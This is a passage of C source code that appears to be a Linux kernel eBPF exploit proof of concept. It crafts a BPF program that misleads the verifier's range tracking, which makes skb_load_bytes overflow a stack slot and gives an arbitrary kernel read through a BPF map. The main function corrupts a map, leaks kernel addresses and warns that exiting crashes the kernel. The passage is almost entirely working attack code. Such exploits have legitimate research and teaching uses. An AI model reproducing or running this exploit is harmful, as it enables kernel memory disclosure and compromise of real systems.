      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t jit_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts("[-] Failed to find corrupted bpf_map");
    return -1;
  }
  printf("[+] mapfd: %d\n", mapfd);
  printf("[+] corrupted_map_fd: %d\n", corrupted_map_fd);
  printf("[+] jit_addr: 0x%016lx\n", jit_addr);

  get_enter_to_continue("Press enter to exit(cause kernel crash)...");

  return 0;
}

Refernece

Read more →